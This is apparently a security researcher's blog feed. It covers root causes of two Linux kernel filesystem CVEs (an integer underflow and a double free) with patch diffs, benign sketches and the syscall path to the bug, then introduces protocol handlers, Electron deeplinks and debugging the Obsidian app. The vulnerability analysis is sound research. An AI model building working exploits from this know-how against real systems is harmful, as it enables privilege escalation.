  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=722d94847de29310e8aa03fcbdb41fc92c521756</p>
</blockquote>

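<p>This is an integer underflow vulnerability in <code class="language-plaintext highlighter-rouge">legacy_parse_param()</code>, a function used to parse mount parameters for legacy filesystems. Because the subtraction in the length check is unsigned, it wraps around once the accumulated size gets close to <code class="language-plaintext highlighter-rouge">PAGE_SIZE</code>. The vulnerability leads to a length check bypass, which is ultimately turned into a heap overflow.</p>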

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -548,7 +548,7 @@</span> static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
                   param-&gt;key);
     }
 
<span class="gd">-   if (len &gt; PAGE_SIZE - 2 - size)
</span><span class="gi">+   if (size + len + 2 &gt; PAGE_SIZE)
</span>        return invalf(fc, "VFS: Legacy: Cumulative options too large");
    if (strchr(param-&gt;key, ',') ||
        (param-&gt;type == fs_value_is_string &amp;&amp;
</code></pre></div></div>
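<p>The two versions of the check can be compared in isolation. The sketch below is a userspace reproduction under stated assumptions: <code class="language-plaintext highlighter-rouge">old_check_rejects()</code>, <code class="language-plaintext highlighter-rouge">new_check_rejects()</code> and <code class="language-plaintext highlighter-rouge">DEMO_PAGE_SIZE</code> are hypothetical names, the page size is assumed to be 4 KiB, and the variable types (<code class="language-plaintext highlighter-rouge">unsigned int size</code>, <code class="language-plaintext highlighter-rouge">size_t len</code>) follow my reading of the kernel function.</p>

```c
#include <stddef.h>

#define DEMO_PAGE_SIZE 4096UL   /* assumption: 4 KiB pages */

/* Pre-patch check: returns 1 if the parameter would be rejected. */
int old_check_rejects(unsigned int size, size_t len)
{
    /* If size > DEMO_PAGE_SIZE - 2, the unsigned subtraction wraps to a
     * huge value, so the comparison is false and nothing is rejected. */
    return len > DEMO_PAGE_SIZE - 2 - size;
}

/* Post-patch check: returns 1 if the parameter would be rejected. */
int new_check_rejects(unsigned int size, size_t len)
{
    /* Only additions are used, so no wrap-around for realistic sizes. */
    return size + len + 2 > DEMO_PAGE_SIZE;
}
```

<p>With <code class="language-plaintext highlighter-rouge">size = 4095</code> and <code class="language-plaintext highlighter-rouge">len = 100</code>, the old check lets the parameter through while the new one rejects it. For small values such as <code class="language-plaintext highlighter-rouge">size = 0</code> and <code class="language-plaintext highlighter-rouge">len = 10</code>, both checks agree.</p>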

<p>We’ve mentioned that the mount parameters are parsed by <code class="language-plaintext highlighter-rouge">parse_monolithic_mount_data()</code>. In fact, to support more flexible configuration, Linux later introduced three new syscalls: <strong><code class="language-plaintext highlighter-rouge">fsopen</code>, <code class="language-plaintext highlighter-rouge">fsconfig</code> and <code class="language-plaintext highlighter-rouge">fsmount</code></strong>. They roughly correspond to the main steps of mounting: creating a filesystem context (selecting the filesystem type), configuring mount options, and finally creating a mount object.</p>

<p>By calling the <code class="language-plaintext highlighter-rouge">fsconfig</code> syscall, we can set the key and value to a malformed parameter, causing the kernel to invoke the filesystem context’s <code class="language-plaintext highlighter-rouge">.parse_param</code> handler, which eventually reaches the vulnerable function <code class="language-plaintext highlighter-rouge">legacy_parse_param()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_fsconfig(fd, cmd, key, value, aux)
=&gt; vfs_fsconfig_locked(fc, cmd, &amp;param)
  =&gt; vfs_parse_fs_param(fc, param)
    =&gt; fc-&gt;ops-&gt;parse_param(fc, param)
       (legacy_fs_context_ops.parse_param == legacy_parse_param)
</code></pre></div></div>

<p>But what kind of filesystem sets <code class="language-plaintext highlighter-rouge">&amp;legacy_fs_context_ops</code> as its filesystem context operations?</p>

<p>We just need to find a filesystem that <strong>does not implement an <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler</strong>. In that case, <code class="language-plaintext highlighter-rouge">alloc_fs_context()</code> falls back to the legacy initialization path.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alloc_fs_context()
=&gt; if (fc-&gt;fs_type-&gt;init_fs_context == NULL)
  =&gt; legacy_init_fs_context(fc)
    =&gt; fc-&gt;ops = &amp;legacy_fs_context_ops
</code></pre></div></div>
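<p>The fallback is a plain “use the default when the function pointer is NULL” pattern. The toy model below only illustrates that dispatch; every <code class="language-plaintext highlighter-rouge">toy_*</code> name is hypothetical and the structures are heavily simplified compared with the kernel’s.</p>

```c
#include <stddef.h>

struct toy_fs_context;

struct toy_context_ops {
    const char *name;                   /* label used only by this sketch */
};

struct toy_fs_type {
    const char *name;
    int (*init_fs_context)(struct toy_fs_context *fc);  /* may be NULL */
};

struct toy_fs_context {
    const struct toy_fs_type *fs_type;
    const struct toy_context_ops *ops;
};

static const struct toy_context_ops toy_legacy_ops = { "legacy" };
static const struct toy_context_ops toy_modern_ops = { "modern" };

/* Default initializer, used when the type provides no handler. */
static int toy_legacy_init(struct toy_fs_context *fc)
{
    fc->ops = &toy_legacy_ops;
    return 0;
}

/* Example of a filesystem-specific initializer. */
static int toy_modern_init(struct toy_fs_context *fc)
{
    fc->ops = &toy_modern_ops;
    return 0;
}

/* Pick the type's own handler if present, otherwise the legacy one. */
int toy_alloc_fs_context(struct toy_fs_context *fc,
                         const struct toy_fs_type *type)
{
    int (*init)(struct toy_fs_context *) = type->init_fs_context;

    fc->fs_type = type;
    fc->ops = NULL;
    if (!init)
        init = toy_legacy_init;
    return init(fc);
}
```

<p>A type declared with a NULL <code class="language-plaintext highlighter-rouge">init_fs_context</code> ends up with the legacy operations, which is the situation an attacker looks for in CVE-2022-0185.</p>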

<h2 id="22-cve-2023-5345-fssmbclient-reset-password-pointer-to-null">2.2. CVE-2023-5345: fs/smb/client: Reset password pointer to NULL</h2>
<blockquote>
  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6e43b8aa7cd3c3af686caf0c2e11819a886d705</p>
</blockquote>

<p>When configuring an SMB filesystem, <code class="language-plaintext highlighter-rouge">smb3_fs_context_parse_param()</code> is called to parse user-provided parameters. However, it forgets to reset <code class="language-plaintext highlighter-rouge">ctx-&gt;password</code> to <code class="language-plaintext highlighter-rouge">NULL</code> after freeing it. As a result, a user can trigger multiple frees on the same pointer.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -1541,6 +1541,7 @@</span> static int smb3_fs_context_parse_param(struct fs_context *fc,
 
  cifs_parse_mount_err:
    kfree_sensitive(ctx-&gt;password);
<span class="gi">+   ctx-&gt;password = NULL;
</span>    return -EINVAL;
 }
</code></pre></div></div>

<p>This function can be reached in the same way as in CVE-2022-0185.</p>
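<p>The fix follows the usual “free, then clear the pointer” idiom. The userspace sketch below models it with <code class="language-plaintext highlighter-rouge">free()</code> instead of <code class="language-plaintext highlighter-rouge">kfree_sensitive()</code>; all <code class="language-plaintext highlighter-rouge">toy_*</code> names are hypothetical, and the parsing logic is invented purely to provide an error path. It shows the patched behaviour only.</p>

```c
#include <stdlib.h>
#include <string.h>

struct toy_ctx {
    char *password;
};

/* Small strdup() replacement so the sketch needs only standard C. */
static char *toy_strdup(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);

    if (p)
        memcpy(p, s, n);
    return p;
}

/* Returns 0 on success, -1 on a parse error. */
int toy_parse_param(struct toy_ctx *ctx, const char *key, const char *value)
{
    if (strcmp(key, "password") == 0) {
        free(ctx->password);            /* replace any previous value */
        ctx->password = toy_strdup(value);
        return ctx->password ? 0 : -1;
    }

    /* Error path: release the secret AND clear the pointer. Without the
     * second line, a later call or the final cleanup would free the same
     * pointer again. */
    free(ctx->password);
    ctx->password = NULL;
    return -1;
}

/* Final cleanup; safe after an error because free(NULL) is a no-op. */
void toy_free_ctx(struct toy_ctx *ctx)
{
    free(ctx->password);
    ctx->password = NULL;
}
```

<p>Hitting the error path twice and then calling the cleanup function is harmless here, because every free after the first one receives <code class="language-plaintext highlighter-rouge">NULL</code>.</p>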

<h1 id="3-summary">3. Summary</h1>

<p>This post just provides a simple overview of the Linux filesystem. The root causes of the two vulnerabilities are relatively straightforward and can be understood by most Linux kernel researchers. I think finding them may not be too difficult for AI nowadays 😆.</p>

<p>But what happens when filesystems interact with <strong>namespaces</strong> or other features, or when <strong>multiple filesystems</strong> are layered or combined? Could unexpected issues arise?</p>

<p>I may write a follow-up post to explore the interaction between the filesystem and other subsystems. It is a complex but interesting topic!</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[Recently I explored the filesystem design of Linux and found it is little more complicated than I expected, so I decided to write a post organizing it. This post analyzes the filesystem from a high-level view, skipping detailed implementation. I hope that after reading it, you will understand more about the Linux filesystem.]]></summary></entry><entry><title type="html">Learning Protocol Handler</title><link href="https://u1f383.github.io/web/2026/01/18/learning-protocol-handler.html" rel="alternate" type="text/html" title="Learning Protocol Handler" /><published>2026-01-18T00:00:00+00:00</published><updated>2026-01-18T00:00:00+00:00</updated><id>https://u1f383.github.io/web/2026/01/18/learning-protocol-handler</id><content type="html" xml:base="https://u1f383.github.io/web/2026/01/18/learning-protocol-handler.html"><![CDATA[<h2 id="0-murmur">0. Murmur</h2>

<p>It has been four months since I last wrote a post… pretty long, lol. The reason is not only that I took a longer break after a busy year (playing games, exercising more, and thinking about the meaning of life), but also that I tried to step out of my comfort zone (in every aspect).</p>

<p>At the end of October, I randomly asked Faith (@farazsth98) if he wanted to participate in the first-year <a href="https://www.zeroday.cloud">zeroday.cloud competition</a>, and maybe we could team up to target Ubuntu. I viewed it as a side project to push myself to do more research on the Linux kernel, and I also wanted to know what it’s like to do research with researchers more senior than me. However, I didn’t expect things to turn out like that. It only took us about three weeks – from finding some unused bugs and one exploitable vulnerability to finishing the exploitation – which is crazy and unimaginable. After that, we spent some time optimizing it, and in the end, we successfully achieved LPE on the latest Ubuntu Server!</p>

<p>This journey sounds great and should have made me even more passionate about security research, right? But after coming back from London (zeroday.cloud was held with BHEU, which was in London), I felt burned out and had no energy to read code for no reason. I started thinking about why I do security research and what I am actually chasing. The bad feeling lasted for three weeks. During this period, I read blogs (not limited to security) and did some non-heavy work, like organizing notes. In my free time, I spent more time thinking about what I was stuck on. As I read more and thought more, I gradually found my passion again, because I could see the enjoyment of sharing in those posts. They were pure happiness, learning new things, sharing cool techniques and stuff like that, and that was what I had lost.</p>

<p>Now, I still have a big project on Linux kernel research, but I also read blogs and do research in areas that I am not familiar with, just for fun. That’s why there were no posts on the blog for months, and why this new post is about web security.</p>

<p>I am neither an expert in web security nor someone with deep research experience in protocol handlers. As a result, I will only provide an overview of protocol handlers along with some of my research notes.</p>

<p>I also want to thank maple (@maple3142) for answering my question and sharing his knowledge!</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>If you click a link that looks like <code class="language-plaintext highlighter-rouge">"XXXX://"</code> – where <code class="language-plaintext highlighter-rouge">XXXX</code> is not a common protocol such as <code class="language-plaintext highlighter-rouge">http</code> or <code class="language-plaintext highlighter-rouge">https</code> – you may see a prompt on the screen asking whether you allow a specific program to open it. For example, if I try to navigate to <code class="language-plaintext highlighter-rouge">slack://XXXX</code> in Safari, macOS will ask me: <strong>“do you allow this website to open <code class="language-plaintext highlighter-rouge">Slack</code>”?</strong> The “Slack” here is the specific program I mentioned earlier.</p>

<p><img src="/assets/image-20260117174451735.png" alt="image-20260117174451735" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>The <strong>protocol handler</strong> describes the situation in which a user clicks a custom protocol link and the operating system then attempts to forward the URL request to the corresponding program. On different operating systems, the relationship between a protocol and a program is defined in different ways.</p>

<p>On macOS, this relationship is defined in the file <code class="language-plaintext highlighter-rouge">~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist</code>, which is also the preference file for the domain <code class="language-plaintext highlighter-rouge">com.apple.launchservices.secure</code>. You can easily read it in a human-readable format using the command <code class="language-plaintext highlighter-rouge">defaults read &lt;domain&gt;</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>defaults <span class="nb">read </span>com.apple.LaunchServices/com.apple.launchservices.secure
<span class="o">{</span>
    LSHandlers <span class="o">=</span>     <span class="o">(</span>
                <span class="o">{</span>
            LSHandlerModificationDate <span class="o">=</span> 0<span class="p">;</span>
            LSHandlerPreferredVersions <span class="o">=</span>             <span class="o">{</span>
                LSHandlerRoleAll <span class="o">=</span> <span class="s2">"-"</span><span class="p">;</span>
            <span class="o">}</span><span class="p">;</span>
            LSHandlerRoleAll <span class="o">=</span> <span class="s2">"com.apple.gamecenter.gamecenteruiservice"</span><span class="p">;</span>
            LSHandlerURLScheme <span class="o">=</span> <span class="s2">"itms-gcs"</span><span class="p">;</span>
        <span class="o">}</span>,
        ...
    <span class="o">)</span><span class="p">;</span>
<span class="o">}</span>
</code></pre></div></div>

<p>On Windows, protocol handlers are defined in the registry, with the following format:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HKEY_CLASSES_ROOT\&lt;protocol_name&gt;\shell\open\command
</code></pre></div></div>

<p>In my Windows VM, the handler for <code class="language-plaintext highlighter-rouge">vscode://</code> is <code class="language-plaintext highlighter-rouge">Code.exe</code> as shown in the screenshot below:</p>

<p><img src="/assets/image-20260117180033526.png" alt="image-20260117180033526" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>On Linux, different distributions may use different mechanisms, so here I will take Ubuntu as an example. On Ubuntu, there is another concept called <strong>MIME types (Media Types)</strong>. MIME types are used to identify file types and determine which applications should open them by default. Protocol handlers are registered as MIME types of the form <code class="language-plaintext highlighter-rouge">x-scheme-handler/&lt;protocol&gt;</code>, so you can find them with the following commands:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># for per-user
grep -ir "MimeType=x-scheme-handler" ~/.local/share/applications/
# for system
grep -ir "MimeType=x-scheme-handler" /usr/share/applications/
</code></pre></div></div>

<p>You will see file content like the following:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MimeType=x-scheme-handler/XXXXX
</code></pre></div></div>

<p>Here, <code class="language-plaintext highlighter-rouge">XXXXX</code> is the protocol name. By opening the corresponding configuration file, you can further identify the program and the command format associated with that protocol. For example, the <code class="language-plaintext highlighter-rouge">snap://</code> protocol is defined in <code class="language-plaintext highlighter-rouge">/usr/share/applications/snap-handle-link.desktop</code>. Reading the file shows that its handler is the program <code class="language-plaintext highlighter-rouge">/usr/bin/snap</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Desktop Entry]
...
Exec=/usr/bin/snap handle-link %U
MimeType=x-scheme-handler/snap;
...
</code></pre></div></div>
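
<p>To list the scheme handlers of a <code class="language-plaintext highlighter-rouge">.desktop</code> file without reading it by hand, the lookup above can be sketched in a few lines of Node.js. This is only a minimal sketch, not a full Desktop Entry parser: the function name <code class="language-plaintext highlighter-rouge">parseSchemeHandlers</code> is hypothetical, and it only reads the <code class="language-plaintext highlighter-rouge">Exec</code> and <code class="language-plaintext highlighter-rouge">MimeType</code> keys of the <code class="language-plaintext highlighter-rouge">[Desktop Entry]</code> group.</p>

```javascript
// Hypothetical helper: extract URL scheme handlers from the text of a .desktop file.
// Only the [Desktop Entry] group is considered; other groups are skipped.
function parseSchemeHandlers(desktopText) {
  const prefix = 'x-scheme-handler/';
  let inMainGroup = false;
  let exec = null;
  const schemes = [];

  for (const rawLine of desktopText.split('\n')) {
    const line = rawLine.trim();
    if (line === '' || line.startsWith('#')) continue;

    // A line starting with '[' opens a new group.
    if (line.startsWith('[')) {
      inMainGroup = line === '[Desktop Entry]';
      continue;
    }
    if (!inMainGroup) continue;

    const eq = line.indexOf('=');
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();

    if (key === 'Exec') {
      exec = value;
    } else if (key === 'MimeType') {
      // MimeType is a semicolon-separated list, e.g. "x-scheme-handler/snap;"
      for (const type of value.split(';')) {
        if (type.startsWith(prefix)) schemes.push(type.slice(prefix.length));
      }
    }
  }
  return { exec, schemes };
}

const sample = [
  '[Desktop Entry]',
  'Exec=/usr/bin/snap handle-link %U',
  'MimeType=x-scheme-handler/snap;',
].join('\n');

console.log(parseSchemeHandlers(sample));
```

<p>The <code class="language-plaintext highlighter-rouge">%U</code> in the <code class="language-plaintext highlighter-rouge">Exec</code> value is the field code that the desktop environment replaces with the URL being opened, which is how the link ends up in the handler’s arguments.</p>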

<h2 id="2-electron">2. Electron</h2>

<p>As <a href="https://www.electronjs.org/docs/latest/">its documentation</a> describes, <strong>Electron</strong> is a framework for building desktop applications using JavaScript, HTML, and CSS, and it embeds <strong>Chromium</strong> and <strong>Node.js</strong> into its binary. By using <strong>Electron</strong>, you only need to maintain one JS codebase to create cross-platform apps that work on Windows, macOS, and Linux!</p>

<p>A diagram from <a href="https://blog.logrocket.com/advanced-electron-js-architecture/">Advanced Electron.js architecture</a> clearly shows the architecture of Electron.</p>

<p><img src="/assets/image-20260117202131871.png" alt="image-20260117202131871" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>The main process (blue one) of Electron is <strong>Node.js</strong>, which provides developers with abundant APIs to use. If you have some knowledge of Chrome, I think its role is similar to the browser process, handling requests from renderer processes that require high privileges.</p>

<p>The renderer process runs inside <strong>Chromium</strong>, and it is responsible for rendering web pages by parsing HTML and CSS and running JavaScript. Since Electron is used to build applications, it can be imagined that each application needs to control how the web pages are rendered and behave.</p>

<p>Electron exposes many JavaScript APIs that developers can hook into. When starting an application, a main script will be executed by Node.js (main process) to set up the environment. Later, when Chromium is loaded, the browser context has already been configured with application-specific behaviors.</p>

<p>One of the features Electron supports is <strong>custom protocol handling</strong>. By using the API <a href="https://www.electronjs.org/docs/latest/api/app#appsetasdefaultprotocolclientprotocol-path-args"><code class="language-plaintext highlighter-rouge">app.setAsDefaultProtocolClient()</code></a>, you can register an application as the handler of a specific protocol. For example, if I want to register my application to be the <code class="language-plaintext highlighter-rouge">myapp://</code> protocol handler, I can run the following JS code in the main script:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">app</span><span class="p">.</span><span class="nx">isDefaultProtocolClient</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span>
    <span class="nx">app</span><span class="p">.</span><span class="nx">setAsDefaultProtocolClient</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp</span><span class="dl">'</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On Windows and Linux, you can write code like the following to handle startup requests triggered by a deeplink:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">whenReady</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">argv</span><span class="p">.</span><span class="nx">find</span><span class="p">(</span><span class="nx">arg</span> <span class="o">=&gt;</span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp://</span><span class="dl">'</span><span class="p">))</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// ...</span>
  <span class="p">}</span>
<span class="p">})</span>
</code></pre></div></div>

<p>Instead of handling requests inside the <code class="language-plaintext highlighter-rouge">app.whenReady()</code> callback, on macOS you must define an <code class="language-plaintext highlighter-rouge">'open-url'</code> event handler:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">open-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">url</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="c1">// ...</span>
<span class="p">})</span>
</code></pre></div></div>

<p>If a deeplink is triggered from within the application or from a browser while an instance is already running, the operating system first launches a second instance. In an application that enforces a single instance (typically by calling <code class="language-plaintext highlighter-rouge">app.requestSingleInstanceLock()</code>), Electron emits a <code class="language-plaintext highlighter-rouge">'second-instance'</code> event in the main instance, carrying the second instance’s arguments, and the second instance then exits. As a result, you may need to define a <code class="language-plaintext highlighter-rouge">'second-instance'</code> event handler to handle this scenario.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">second-instance</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">argv</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">argv</span><span class="p">.</span><span class="nx">find</span><span class="p">(</span><span class="nx">arg</span> <span class="o">=&gt;</span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">myapp://</span><span class="dl">'</span><span class="p">))</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// ...</span>
  <span class="p">}</span>
<span class="p">})</span>
</code></pre></div></div>
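
<p>Both the startup path and the <code class="language-plaintext highlighter-rouge">'second-instance'</code> handler scan an argument list for the URL, so the lookup can live in one helper. The sketch below is an assumption of mine rather than anything Electron provides: <code class="language-plaintext highlighter-rouge">findDeepLink</code> is a hypothetical name, and it additionally parses the string with the standard <code class="language-plaintext highlighter-rouge">URL</code> class so malformed links are rejected early. It needs only Node.js.</p>

```javascript
// Hypothetical helper shared by the startup path and the 'second-instance' handler.
// Returns a parsed URL object, or null if argv holds no well-formed link for the scheme.
function findDeepLink(argv, scheme = 'myapp') {
  const prefix = scheme + '://';
  const raw = argv.find(arg => arg.startsWith(prefix));
  if (!raw) return null;

  try {
    // The WHATWG URL parser throws a TypeError on malformed input.
    return new URL(raw);
  } catch (err) {
    return null;
  }
}

const link = findDeepLink(['/path/to/app', '--flag', 'myapp://open?file=notes.md']);
if (link) {
  console.log(link.protocol, link.searchParams.get('file'));
}
```

<p>Since the link can come from any website, every component of the parsed URL should still be treated as attacker-controlled input.</p>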

<h2 id="3-obsidian">3. Obsidian</h2>

<h3 id="31-file-extraction">3.1. File Extraction</h3>

<p><a href="https://obsidian.md">Obsidian</a> is a free note-taking app based on Electron (btw, I’ve used this app to take research notes for two years, so you should give it a try!).</p>

<p>After installation, it registers the <code class="language-plaintext highlighter-rouge">obsidian://</code> protocol handler, which invokes <code class="language-plaintext highlighter-rouge">Obsidian.exe</code> to handle the URL requests.</p>

<p><img src="/assets/image-20260117234251391.png" alt="image-20260117234251391" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>Obsidian is not an open-source project, but you can download its ASAR file from the <a href="https://github.com/obsidianmd/obsidian-releases/releases/tag/v1.11.4">GitHub release</a>. <strong>ASAR (Atom Shell Archive)</strong> is a file format used by Electron to package applications. This file is generated by the <code class="language-plaintext highlighter-rouge">asar</code> Node.js package, and you can use the <code class="language-plaintext highlighter-rouge">extract</code> command to unpack it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx asar extract obsidian-1.11.4.asar out
</code></pre></div></div>

<p>Once the <code class="language-plaintext highlighter-rouge">obsidian-XXXX.asar</code> is extracted, you will find the following files:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ tree -L 1
.
...
├── app.js
...
├── main.js
├── package.json
...
└── worker.js
</code></pre></div></div>

<p>The attribute <code class="language-plaintext highlighter-rouge">"main"</code> in <code class="language-plaintext highlighter-rouge">package.json</code> defines which JS file is executed first. However, <code class="language-plaintext highlighter-rouge">index.js</code> is missing from the extracted directory. Why?</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="err">...</span><span class="w">
    </span><span class="nl">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"index.js"</span><span class="p">,</span><span class="w">
    </span><span class="err">...</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>If you directly install Obsidian from the released <code class="language-plaintext highlighter-rouge">.deb</code> package on Ubuntu (my VM is Ubuntu haha), you’ll find that <code class="language-plaintext highlighter-rouge">/opt/Obsidian/resources</code> contains not only <code class="language-plaintext highlighter-rouge">obsidian.asar</code> but also <code class="language-plaintext highlighter-rouge">app.asar</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span> /opt/Obsidian/resources
...
<span class="nt">-rw-rw-r--</span> 1 root root    86730 Jan 12 22:46 app.asar
...
<span class="nt">-rwxrwxr-x</span> 1 root root 25878062 Jan 12 22:46 obsidian.asar
</code></pre></div></div>

<p>According to the <a href="https://github.com/electron/electron/blob/5bd2938f6af2ef9060772796f02c3ac9c80d5cdb/lib/browser/init.ts#L199">Electron source code</a> and related posts, it appears that the archive named <code class="language-plaintext highlighter-rouge">app.asar</code> is the one actually loaded. Inside <code class="language-plaintext highlighter-rouge">app.asar</code>, the <code class="language-plaintext highlighter-rouge">package.json</code> file defines <code class="language-plaintext highlighter-rouge">main.js</code> as the main JS script.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="err">...</span><span class="w">
    </span><span class="nl">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"main.js"</span><span class="p">,</span><span class="w">
    </span><span class="err">...</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Its content looks more like what I would expect from the entry point of an Electron application. By reading the code, we can also see that <code class="language-plaintext highlighter-rouge">obsidian.asar</code> is loaded after the first stage of initialization.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">let</span> <span class="nx">asarPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">APP_PATH</span><span class="p">,</span> <span class="dl">'</span><span class="s1">obsidian.asar</span><span class="dl">'</span><span class="p">);</span>

<span class="c1">// [...]</span>

<span class="kd">function</span> <span class="nx">loadApp</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Execute asar content</span>
    <span class="kd">let</span> <span class="nx">main</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">,</span> <span class="dl">'</span><span class="s1">main.js</span><span class="dl">'</span><span class="p">);</span>

    <span class="kd">let</span> <span class="nx">fn</span><span class="p">;</span>
    <span class="k">try</span> <span class="p">{</span>
        <span class="nx">fn</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="nx">main</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="nx">fn</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">fn</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">,</span> <span class="nx">updateEvents</span><span class="p">);</span>
        <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// [...]</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">success</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Loading main app package</span><span class="dl">'</span><span class="p">,</span> <span class="nx">asarPath</span><span class="p">);</span>
    <span class="nx">success</span> <span class="o">=</span> <span class="nx">loadApp</span><span class="p">(</span><span class="nx">asarPath</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="32-debugging">3.2. Debugging</h3>

<h3 id="321-runtime-patch">3.2.1. Runtime Patch</h3>

<p>Here I want to share how I debug Obsidian. To be honest, this is also the main reason why I wrote this post. It covers basic Electron application debugging (which I didn’t know before) and runtime patches to enable Obsidian’s inspector.</p>

<p>Normally, an Electron application supports two ways to debug: <strong>DevTools</strong> and <strong>Inspector</strong>. I believe everyone has used DevTools before, but you may not expect that it is also embedded inside an Electron app.</p>

<p>For Obsidian, you can use the shortcut <code class="language-plaintext highlighter-rouge">option + command + I</code> on macOS or <code class="language-plaintext highlighter-rouge">shift + control + I</code> on Ubuntu to open the DevTools.</p>

<p><img src="/assets/image-20260118112354908.png" alt="image-20260118112354908" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>By opening the <code class="language-plaintext highlighter-rouge">sources</code> tab, you can see which code is executed on this page. You can also set breakpoints and debug it directly.</p>

<p><img src="/assets/image-20260118112733927.png" alt="image-20260118112733927" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>It is straightforward, right? However, this only debugs the current page running in the <strong>renderer process</strong>. What about the main process, which is the <strong>Node.js process</strong>? That is where the second method comes in: <strong>Inspector</strong>.</p>

